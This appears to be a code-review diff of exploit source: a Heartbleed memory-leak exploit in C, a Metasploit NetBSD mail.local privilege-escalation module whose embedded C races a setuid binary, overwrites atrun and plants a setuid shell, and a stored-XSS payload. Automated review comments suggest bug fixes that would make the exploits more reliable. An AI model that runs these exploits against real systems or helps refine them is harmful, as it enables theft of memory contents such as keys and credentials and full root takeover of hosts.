if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
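Review bot: `bytes = SSL_read(c->sslHandle, buf, 4095);` is printed with `%d` but never checked for `<= 0`, and `buf` is then written to the terminal with `%s` exactly as received, so anything the peer sends, including terminal control sequences, reaches the operator's screen unfiltered. Check `bytes <= 0`, and print the data with the hex-dump loop `sneakyleaky` already uses in verbose mode (or strip non-printable bytes first). `int rc = SSL_accept(c->sslHandle);` is unused here as well.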
@ -528,16 +528,16 @@ int pre_cmd(int sd,int precmd,int verbose){
|
|||
char* line2;
|
||||
switch(precmd){
|
||||
case 0:
|
||||
line1 = \\\"EHLO test\\\\n\\\";
|
||||
line2 = \\\"STARTTLS\\\\n\\\";
|
||||
line1 = "EHLO test\n";
|
||||
line2 = "STARTTLS\n";
|
||||
break;
|
||||
case 1:
|
||||
line1 = \\\"CAPA\\\\n\\\";
|
||||
line2 = \\\"STLS\\\\n\\\";
|
||||
line1 = "CAPA\n";
|
||||
line2 = "STLS\n";
|
||||
break;
|
||||
case 2:
|
||||
line1 = \\\"a001 CAPB\\\\n\\\";
|
||||
line2 = \\\"a002 STARTTLS\\\\n\\\";
|
||||
line1 = "a001 CAPB\n";
|
||||
line2 = "a002 STARTTLS\n";
|
||||
break;
|
||||
default:
|
||||
go = 1;
|
||||
|
@ -546,23 +546,23 @@ int pre_cmd(int sd,int precmd,int verbose){
|
|||
if(go==0){
|
||||
buffer = malloc(2049);
|
||||
if(buffer==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
printf(\\\"[ banner: %s\\\",buffer);
|
||||
printf("[ banner: %s",buffer);
|
||||
send(sd,line1,strlen(line1),0);
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
if(verbose==1){
|
||||
printf(\\\"%s\\\\n\\\",buffer);
|
||||
printf("%s\n",buffer);
|
||||
}
|
||||
send(sd,line2,strlen(line2),0);
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
if(verbose==1){
|
||||
printf(\\\"%s\\\\n\\\",buffer);
|
||||
printf("%s\n",buffer);
|
||||
}
|
||||
}
|
||||
return sd;
|
||||
|
@ -573,7 +573,7 @@ void* heartbleed(connection *c,unsigned int type){
|
|||
int ret;
|
||||
buf = OPENSSL_malloc(1 + 2);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
p = buf;
|
||||
|
@ -586,11 +586,11 @@ void* heartbleed(connection *c,unsigned int type){
|
|||
s2n(0xffff,p);
|
||||
break;
|
||||
default:
|
||||
printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
|
||||
printf("[ setting heartbeat payload_length to %u\n",type);
|
||||
s2n(type,p);
|
||||
break;
|
||||
}
|
||||
printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
|
||||
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
|
||||
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
|
||||
OPENSSL_free(buf);
|
||||
return c;
|
||||
|
@ -601,9 +601,9 @@ void* dtlsheartbleed(connection *c,unsigned int type){
unsigned char *buf, *p;
int ret;
buf = OPENSSL_malloc(1 + 2 + 16);
memset(buf, \\\'\\\\0\\\', sizeof buf);
memset(buf, '\0', sizeof buf);
if(buf==NULL){
printf(\\\"[ error in malloc()\\\\n\\\");
printf("[ error in malloc()\n");
exit(0);
}
p = buf;
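Review bot: `memset(buf, '\0', sizeof buf);` runs before the `if(buf==NULL)` check and uses `sizeof buf`, the size of the pointer rather than the 19 bytes requested by `OPENSSL_malloc(1 + 2 + 16)`; on allocation failure it dereferences NULL before the error message is reached, and on success it zeroes only the first 8 (or 4) bytes. Move the memset below the NULL check and pass the allocation size; the TLS variant in the previous hunk has no memset at all, so the two should be made consistent.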
@ -618,12 +618,12 @@ void* dtlsheartbleed(connection *c,unsigned int type){
s2n(0x0538,p);
break;
default:
printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
printf("[ setting heartbeat payload_length to %u\n",type);
s2n(type,p);
break;
}
s2n(c->sslHandle->tlsext_hb_seq, p);
printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");

ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);

@ -674,18 +674,18 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
version=(ssl_major<<8)|ssl_minor;
n2s(p,rr->length);
if(rr->type==24){
printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
if(rr->length > 16834){
printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
printf("[ error: got a malformed TLS length.\n");
exit(0);
}
}
else{
printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
badpackets++;
if(badpackets > 3){
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
printf("[ error: too many bad packets recieved\n");
exit(0);
}
goto apple;
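Review bot: `if(rr->length > 16834)` looks like a transposition of 16384 (2^14, the TLS record plaintext limit), so the malformed-length guard is 450 bytes too generous; since the string on the next line is being edited anyway, the constant should be corrected in the same change. The `recieved` spelling in `[ error: too many bad packets recieved` survives on both sides of the hunk.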
@ -696,7 +696,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
n=ssl3_read_n(s,i,i,1);
if (n <= 0) goto apple;
}
printf(\\\"[ decrypting SSL packet\\\\n\\\");
printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
rr->data=rr->input;
@ -763,11 +763,11 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
first = 2;
leakbytes = heartbleed_len + 16;
printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
}
if(verbose==1){
{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
printf(\\\"\\\\n\\\");
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
leakbytes-=rr->length;
if(leakbytes > 0){
@ -776,7 +776,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
else{
repeat = 0;
}
printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
int output = s->s3->rrec.length-3;
if(output > 0){
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
@ -784,24 +784,24 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
first--;
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
/* first three bytes are resp+len */
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
}
else{
/* heap data & 16 bytes padding */
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
}
close(fd);
}
else{
printf(\\\"[ nothing from the heap to write\\\\n\\\");
printf("[ nothing from the heap to write\n");
}
return;
apple:
printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
printf("[ problem handling SSL record packet - wrong type?\n");
badpackets++;
if(badpackets > 3){
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
printf("[ error: too many bad packets recieved\n");
exit(0);
}
return;
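Review bot: `write(fd,s->s3->rrec.data+3,s->s3->rrec.length);` starts three bytes into the record (the comment says the first three bytes are resp+len) but still writes `rrec.length` bytes, so it reads three bytes past the end of the record buffer; the printf that follows reports `rrec.length-3`, while the else branch makes the identical call and reports `rrec.length`. Both branches should write and report the same count. The `write()` return value is also ignored, and `exit(0)` after `too many bad packets` signals success to the shell.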
@ -843,18 +843,18 @@ again:
p+=6;
n2s(p,rr->length);
if(rr->type==24){
printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
if(rr->length > 16834){
printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
printf("[ error: got a malformed TLS length.\n");
exit(0);
}
}
else{
printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
badpackets++;
if(badpackets > 3){
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
printf("[ error: too many bad packets recieved\n");
exit(0);
}
goto apple;
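Review bot: This is the DTLS copy of the record check above and carries the same `16834` constant and `recieved` spelling; the two copies should be fixed together, or better, factored into one helper so they cannot drift.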
@ -872,7 +872,7 @@ again:
s->packet_length = 0;
goto again;
}
printf(\\\"[ decrypting SSL packet\\\\n\\\");
printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;

bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);
@ -977,11 +977,11 @@ if (is_next_epoch)
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
first = 2;
leakbytes = heartbleed_len + 16;
printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
}
if(verbose==1){
{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
printf(\\\"\\\\n\\\");
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
leakbytes-=rr->length;
if(leakbytes > 0){
@ -990,7 +990,7 @@ if (is_next_epoch)
else{
repeat = 0;
}
printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
int output = s->s3->rrec.length-3;
if(output > 0){
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
@ -998,17 +998,17 @@ if (is_next_epoch)
first--;
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
/* first three bytes are resp+len */
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
}
else{
/* heap data & 16 bytes padding */
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
}
close(fd);
}
else{
printf(\\\"[ nothing from the heap to write\\\\n\\\");
printf("[ nothing from the heap to write\n");
}

dtls1_stop_timer(c->sslHandle);
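Review bot: Same overread as in the TLS sneakyleaky hunk: `write(fd,s->s3->rrec.data+3,s->s3->rrec.length);` skips three header bytes but writes the full record length, and the two branches disagree on the byte count they print for the same call.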
@ -1017,10 +1017,10 @@ if (is_next_epoch)

return;
apple:
printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
printf("[ problem handling SSL record packet - wrong type?\n");
badpackets++;
if(badpackets > 3){
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
printf("[ error: too many bad packets recieved\n");
exit(0);
}
return;
@ -1192,25 +1192,25 @@ static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)


void usage(){
printf(\\\"[\\\\n\\\");
printf(\\\"[ --server|-s <ip/dns> - the server to target\\\\n\\\");
printf(\\\"[ --port|-p <port> - the port to target\\\\n\\\");
printf(\\\"[ --file|-f <filename> - file to write data to\\\\n\\\");
printf(\\\"[ --bind|-b <ip> - bind to ip for exploiting clients\\\\n\\\");
printf(\\\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\\\n\\\");
printf(\\\"[ 0 = SMTP\\\\n\\\");
printf(\\\"[ 1 = POP3\\\\n\\\");
printf(\\\"[ 2 = IMAP\\\\n\\\");
printf(\\\"[ --loop|-l - loop the exploit attempts\\\\n\\\");
printf(\\\"[ --type|-t <n> - select exploit to try\\\\n\\\");
printf(\\\"[ 0 = null length\\\\n\\\");
printf(\\\"[ 1 = max leak\\\\n\\\");
printf(\\\"[ n = heartbeat payload_length\\\\n\\\");
printf(\\\"[ --udp|-u - use dtls/udp\\\\n\\\");
printf(\\\"[\\\\n\\\");
printf(\\\"[ --verbose|-v - output leak to screen\\\\n\\\");
printf(\\\"[ --help|-h - this output\\\\n\\\");
printf(\\\"[\\\\n\\\");
printf("[\n");
printf("[ --server|-s <ip/dns> - the server to target\n");
printf("[ --port|-p <port> - the port to target\n");
printf("[ --file|-f <filename> - file to write data to\n");
printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n");
printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n");
printf("[ 0 = SMTP\n");
printf("[ 1 = POP3\n");
printf("[ 2 = IMAP\n");
printf("[ --loop|-l - loop the exploit attempts\n");
printf("[ --type|-t <n> - select exploit to try\n");
printf("[ 0 = null length\n");
printf("[ 1 = max leak\n");
printf("[ n = heartbeat payload_length\n");
printf("[ --udp|-u - use dtls/udp\n");
printf("[\n");
printf("[ --verbose|-v - output leak to screen\n");
printf("[ --help|-h - this output\n");
printf("[\n");
exit(0);
}

@ -1222,92 +1222,92 @@ int main(int argc, char* argv[]){
connection* c;
char *host, *file;
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
printf(\\\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\\\n\\\");
printf(\\\"[ =============================================================\\\\n\\\");
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
printf("[ =============================================================\n");
static struct option options[] = {
{\\\"server\\\", 1, 0, \\\'s\\\'},
{\\\"port\\\", 1, 0, \\\'p\\\'},
{\\\"file\\\", 1, 0, \\\'f\\\'},
{\\\"type\\\", 1, 0, \\\'t\\\'},
{\\\"bind\\\", 1, 0, \\\'b\\\'},
{\\\"verbose\\\", 0, 0, \\\'v\\\'},
{\\\"precmd\\\", 1, 0, \\\'c\\\'},
{\\\"loop\\\", 0, 0, \\\'l\\\'},
{\\\"help\\\", 0, 0,\\\'h\\\'},
{\\\"udp\\\", 0, 0, \\\'u\\\'}
{"server", 1, 0, 's'},
{"port", 1, 0, 'p'},
{"file", 1, 0, 'f'},
{"type", 1, 0, 't'},
{"bind", 1, 0, 'b'},
{"verbose", 0, 0, 'v'},
{"precmd", 1, 0, 'c'},
{"loop", 0, 0, 'l'},
{"help", 0, 0,'h'},
{"udp", 0, 0, 'u'}
};
while(userc != -1) {
userc = getopt_long(argc,argv,\\\"s:p:f:t:b:c:lvhu\\\",options,&index);
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);
switch(userc) {
case -1:
break;
case \\\'s\\\':
case 's':
if(ihost==0){
ihost = 1;
h = gethostbyname(optarg);
if(h==NULL){
printf(\\\"[!] FATAL: unknown host \\\'%s\\\'\\\\n\\\",optarg);
printf("[!] FATAL: unknown host '%s'\n",optarg);
exit(1);
}
host = malloc(strlen(optarg) + 1);
if(host==NULL){
printf(\\\"[ error in malloc()\\\\n\\\");
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,\\\"%s\\\",optarg);
sprintf(host,"%s",optarg);
}
break;
case \\\'p\\\':
case 'p':
if(iport==0){
port = atoi(optarg);
iport = 1;
}
break;
case \\\'f\\\':
case 'f':
if(ifile==0){
file = malloc(strlen(optarg) + 1);
if(file==NULL){
printf(\\\"[ error in malloc()\\\\n\\\");
printf("[ error in malloc()\n");
exit(0);
}
sprintf(file,\\\"%s\\\",optarg);
sprintf(file,"%s",optarg);
ifile = 1;
}
break;
case \\\'t\\\':
case 't':
if(itype==0){
type = atoi(optarg);
itype = 1;
}
break;
case \\\'h\\\':
case 'h':
usage();
break;
case \\\'b\\\':
case 'b':
if(ihost==0){
ihost = 1;
host = malloc(strlen(optarg)+1);
if(host==NULL){
printf(\\\"[ error in malloc()\\\\n\\\");
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,\\\"%s\\\",optarg);
sprintf(host,"%s",optarg);
bind = 1;
}
break;
case \\\'c\\\':
case 'c':
if(iprecmd == 0){
iprecmd = 1;
precmd = atoi(optarg);
}
break;
case \\\'v\\\':
case 'v':
verbose = 1;
break;
case \\\'l\\\':
case 'l':
loop = 1;
break;
case \\\'u\\\':
case 'u':
udp = 1;
break;

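Review bot: The `options[]` array handed to `getopt_long` ends with `{"udp", 0, 0, 'u'}` and has no all-zero terminating element; getopt_long scans until it finds one, so an unrecognised long option reads past the end of the array. Smaller points in the same hunk: unknown host uses `exit(1)` while every malloc failure uses `exit(0)`, and `case 'b':` reuses `host` and `ihost`, which makes `--server` and `--bind` silently mutually exclusive without the usage text saying so.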
@ -1316,7 +1316,7 @@ int main(int argc, char* argv[]){
}
}
if(ihost==0||iport==0||ifile==0||itype==0){
printf(\\\"[ try --help\\\\n\\\");
printf("[ try --help\n");
exit(0);
}
ssl_init();
@ -1329,7 +1329,7 @@ int main(int argc, char* argv[]){
dtlssneakyleaky(c,file,verbose);
}
while(loop==1){
printf(\\\"[ entered heartbleed loop\\\\n\\\");
printf("[ entered heartbleed loop\n");
first=0;
repeat=1;
dtlsheartbleed(c,type);
@ -1347,7 +1347,7 @@ int main(int argc, char* argv[]){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf(\\\"[ entered heartbleed loop\\\\n\\\");
printf("[ entered heartbleed loop\n");
first=0;
repeat=1;
heartbleed(c,type);
@ -1373,7 +1373,7 @@ int main(int argc, char* argv[]){
dtlsheartbleed(c,type);
dtlssneakyleaky(c,file,verbose);
while(loop==1){
printf(\\\"[ entered heartbleed loop\\\\n\\\");
printf("[ entered heartbleed loop\n");
first=0;
repeat=0;
dtlsheartbleed(c,type);
@ -1389,7 +1389,7 @@ int main(int argc, char* argv[]){
while(1){
sd=accept(ret,0,0);
if(sd==-1){
printf(\\\"[!] FATAL: problem with accept()\\\\n\\\");
printf("[!] FATAL: problem with accept()\n");
exit(0);
}
if(pid=fork()){
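Review bot: `if(pid=fork()){` hides an assignment inside the condition and does not distinguish the -1 failure case from the parent; write `if((pid = fork()) != 0)` after an explicit `pid == -1` check. The `accept()` failure path is labelled FATAL but exits with status 0.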
@ -1403,7 +1403,7 @@ int main(int argc, char* argv[]){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf(\\\"[ entered heartbleed loop\\\\n\\\");
printf("[ entered heartbleed loop\n");
first=0;
repeat=0;
heartbleed(c,type);
@ -1411,7 +1411,7 @@ int main(int argc, char* argv[]){
sneakyleaky(c,file,verbose);
}
}
printf(\\\"[ done.\\\\n\\\");
printf("[ done.\n");
exit(0);
}
}

@ -29,5 +29,5 @@ Stored XSS:
http://localhost:8181/editPage.yaws?node=home

The large textbox on the editPage.yaws page is vulnerable to xss. This is
the\"text\" post variable:
the"text" post variable:
<script>alert(1)</script>

@ -3,7 +3,7 @@
# Current source: https://github.com/rapid7/metasploit-framework
##

require \"msf/core\"
require "msf/core"

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
@ -13,56 +13,56 @@ class MetasploitModule < Msf::Exploit::Local

def initialize(info = {})
super(update_info(info,
\'Name\' => \'NetBSD mail.local Privilege Escalation\',
\'Description\' => %q{
'Name' => 'NetBSD mail.local Privilege Escalation',
'Description' => %q{
This module attempts to exploit a race condition in mail.local with SUID bit set on:
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
NetBSD 6.1 - 6.1.5
NetBSD 6.0 - 6.0.6
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
},
\'License\' => MSF_LICENSE,
\'Author\' =>
'License' => MSF_LICENSE,
'Author' =>
[
\'h00die <mike@stcyrsecurity.com>\', # Module
\'akat1\' # Discovery
'h00die <mike@stcyrsecurity.com>', # Module
'akat1' # Discovery
],

\'DisclosureDate\' => \'Jul 07 2016\',
\'Platform\' => \'unix\',
\'Arch\' => ARCH_CMD,
\'SessionTypes\' => %w{shell meterpreter},
\'Privileged\' => true,
\'Payload\' => {
\'Compat\' => {
\'PayloadType\' => \'cmd cmd_bash\',
\'RequiredCmd\' => \'generic openssl\'
'DisclosureDate' => 'Jul 07 2016',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic openssl'
}
},
\'Targets\' =>
'Targets' =>
[
[ \'Automatic Target\', {}]
[ 'Automatic Target', {}]
],
\'DefaultTarget\' => 0,
\'DefaultOptions\' => { \'WfsDelay\' => 603 }, #can take 10min for cron to kick
\'References\' =>
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
'References' =>
[
[ \"URL\", \"http://akat1.pl/?id=2\"],
[ \"EDB\", \"40141\"],
[ \"CVE\", \"2016-6253\"],
[ \"URL\", \"http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc\"]
[ "URL", "http://akat1.pl/?id=2"],
[ "EDB", "40141"],
[ "CVE", "2016-6253"],
[ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
]
))
register_options([
OptString.new(\'ATRUNPATH\', [true, \'Location of atrun binary\', \'/usr/libexec/atrun\']),
OptString.new(\'MAILDIR\', [true, \'Location of mailboxes\', \'/var/mail\']),
OptString.new(\'WritableDir\', [ true, \'A directory where we can write files\', \'/tmp\' ]),
OptInt.new(\'ListenerTimeout\', [true, \'Number of seconds to wait for the exploit\', 603])
OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
], self.class)
end

def exploit
# lots of this file\'s format is based on pkexec.rb
# lots of this file's format is based on pkexec.rb

# direct copy of code from exploit-db
main = %q{
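Review bot: The 603-second wait is declared twice, once as `'WfsDelay' => 603` in DefaultOptions and again as the `ListenerTimeout` default, with the reason given only in a trailing comment; derive one from the other and move the explanation into the Description. The Description attributes the delay to "a crontab job with root privilege" while the C source below waits on atrun(1); naming atrun there would make the two agree.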
@ -77,20 +77,20 @@ class MetasploitModule < Msf::Exploit::Local
#include <err.h>
#include <sys/wait.h>

#define ATRUNPATH \"/usr/libexec/atrun\"
#define MAILDIR \"/var/mail\"
#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"

static int
overwrite_atrun(void)
{
char *script = \"#! /bin/sh\\n\"
\"cp /bin/ksh /tmp/ksh\\n\"
\"chmod +s /tmp/ksh\\n\";
char *script = "#! /bin/sh\n"
"cp /bin/ksh /tmp/ksh\n"
"chmod +s /tmp/ksh\n";
size_t size;
FILE *fh;
int rv = 0;

fh = fopen(ATRUNPATH, \"wb\");
fh = fopen(ATRUNPATH, "wb");

if (fh == NULL) {
rv = -1;
@ -118,16 +118,16 @@ class MetasploitModule < Msf::Exploit::Local
size_t size;
int rv = 0, fd;

in = fopen(from, \"rb\");
in = fopen(from, "rb");
if (create == 0)
out = fopen(dest, \"wb\");
out = fopen(dest, "wb");
else {
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
if (fd == -1) {
rv = -1;
goto out;
}
out = fdopen(fd, \"wb\");
out = fdopen(fd, "wb");
}

if (in == NULL || out == NULL) {
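Review bot: In `copy_file`, `in = fopen(from, "rb")` is opened before the `open(dest, O_WRONLY | O_EXCL | O_CREAT, ...)` call, and the `fd == -1` branch jumps to `out` without closing `in`, leaking the handle on every failed backup; open the destination first, or close `in` on that path. The `O_EXCL` flag is the right choice for the backup copy, since it refuses to follow a pre-existing file at the destination.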
@ -163,48 +163,48 @@ class MetasploitModule < Msf::Exploit::Local
login = getlogin();

if (login == NULL)
err(EXIT_FAILURE, \"who are you?\");
err(EXIT_FAILURE, "who are you?");

uid = getuid();

asprintf(&mailbox, MAILDIR \"/%s\", login);
asprintf(&mailbox, MAILDIR "/%s", login);

if (mailbox == NULL)
err(EXIT_FAILURE, NULL);

if (access(mailbox, F_OK) != -1) {
/* backup mailbox */
asprintf(&mailbox_backup, \"/tmp/%s\", login);
asprintf(&mailbox_backup, "/tmp/%s", login);
if (mailbox_backup == NULL)
err(EXIT_FAILURE, NULL);
}

if (mailbox_backup != NULL) {
fprintf(stderr, \"[+] backup mailbox %s to %s\\n\", mailbox, mailbox_backup);
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
if (copy_file(mailbox, mailbox_backup, 1))
err(EXIT_FAILURE, \"[-] failed\");
err(EXIT_FAILURE, "[-] failed");
}

/* backup atrun(1) */
atrun_backup = strdup(\"/tmp/atrun\");
atrun_backup = strdup("/tmp/atrun");
if (atrun_backup == NULL)
err(EXIT_FAILURE, NULL);

fprintf(stderr, \"[+] backup atrun(1) %s to %s\\n\", ATRUNPATH, atrun_backup);
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);

if (copy_file(ATRUNPATH, atrun_backup, 1))
err(EXIT_FAILURE, \"[-] failed\");
err(EXIT_FAILURE, "[-] failed");

/* win the race */
fprintf(stderr, \"[+] try to steal %s file\\n\", ATRUNPATH);
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);

switch (pid = fork()) {
case -1:
err(EXIT_FAILURE, NULL);
/* NOTREACHED */
case 0:
asprintf(&buf, \"echo x | /usr/libexec/mail.local -f xxx %s \"
\"2> /dev/null\", login);
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
"2> /dev/null", login);

for(;;)
system(buf);
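Review bot: The backup locations `"/tmp/%s"` and `"/tmp/atrun"` are hardcoded in the C source, while the Ruby wrapper only patches ATRUNPATH and MAILDIR and exposes a `WritableDir` option, so WritableDir is honoured for the payload and binary but not for these two files; patch them the same way. The child's `for(;;) system(buf);` is only ever stopped by the parent's `kill(pid, 9)`, so if the parent exits first (any of the `err()` calls above can do that) the child keeps spawning mail.local indefinitely; a bounded loop or a parent-death check would make cleanup reliable.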
@ -224,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Local
if (lstat(ATRUNPATH, &sb) == 0) {
if (sb.st_uid == uid) {
kill(pid, 9);
fprintf(stderr, \"[+] won race!\\n\");
fprintf(stderr, "[+] won race!\n");
break;
}
}
@ -235,16 +235,16 @@ class MetasploitModule < Msf::Exploit::Local

if (mailbox_backup != NULL) {
/* restore mailbox */
fprintf(stderr, \"[+] restore mailbox %s to %s\\n\", mailbox_backup, mailbox);
fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);

if (copy_file(mailbox_backup, mailbox, 0))
err(EXIT_FAILURE, \"[-] failed\");
err(EXIT_FAILURE, "[-] failed");
if (unlink(mailbox_backup) != 0)
err(EXIT_FAILURE, \"[-] failed\");
err(EXIT_FAILURE, "[-] failed");
}

/* overwrite atrun */
fprintf(stderr, \"[+] overwriting atrun(1)\\n\");
fprintf(stderr, "[+] overwriting atrun(1)\n");

if (chmod(ATRUNPATH, 0755) != 0)
err(EXIT_FAILURE, NULL);
@ -252,79 +252,79 @@ class MetasploitModule < Msf::Exploit::Local
if (overwrite_atrun())
err(EXIT_FAILURE, NULL);

fprintf(stderr, \"[+] waiting for atrun(1) execution...\\n\");
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");

for(;;sleep(1)) {
if (access(\"/tmp/ksh\", F_OK) != -1)
if (access("/tmp/ksh", F_OK) != -1)
break;
}

/* restore atrun */
fprintf(stderr, \"[+] restore atrun(1) %s to %s\\n\", atrun_backup, ATRUNPATH);
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);

if (copy_file(atrun_backup, ATRUNPATH, 0))
err(EXIT_FAILURE, \"[-] failed\");
err(EXIT_FAILURE, "[-] failed");
if (unlink(atrun_backup) != 0)
err(EXIT_FAILURE, \"[-] failed\");
err(EXIT_FAILURE, "[-] failed");

if (chmod(ATRUNPATH, 0555) != 0)
err(EXIT_FAILURE, NULL);

fprintf(stderr, \"[+] done! Don\'t forget to change atrun(1) \"
\"ownership.\\n\");
fprintf(stderr, \"Enjoy your shell:\\n\");
